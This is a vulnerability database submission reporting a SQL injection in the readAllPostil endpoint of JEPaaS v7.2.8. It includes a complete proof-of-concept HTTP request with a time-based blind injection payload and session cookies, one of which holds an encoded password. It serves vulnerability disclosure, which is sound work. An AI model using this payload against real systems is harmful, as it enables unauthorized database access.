Submit #707178: JEPaaS v7.2.8 SQL Injectioninfo

TitelJEPaaS v7.2.8 SQL Injection
Beschreibunghttps://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md The /je/postil/postil/readAllPostil interface in JEPaaS uses string concatenation in SQL statements, resulting in a SQL injection vulnerability The request is as follows: POST /je/postil/postil/readAllPostil?keyword=%25'+AND+IF(LENGTH(database())=6,SLEEP(2),0)+AND+'%25'%3d' HTTP/1.1 Host: Cookie: je-local-lang=zh_CN; JSESSIONID=BDFF4DEC4216AE260303D79CBE35CA06; phone=admin; password=TVRJeg==; authorization=TIUxAb8r8IilqFzx9Xg Content-Type: application/json; charset=utf-8 Content-Length: 2 {}
Quelle⚠️ https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md
Benutzer
 c3p0ooo_Yiqiyin (UID 44113)
Einreichung05.12.2025 10:44 (vor 5 Monaten)
Moderieren14.12.2025 13:09 (9 days later)
StatusAkzeptiert
VulDB Eintrag336412 [ketr JEPaaS bis 7.2.8 readAllPostil keyWord SQL Injection]
Punkte20

Want to know what is going to be exploited?

We predict KEV entries!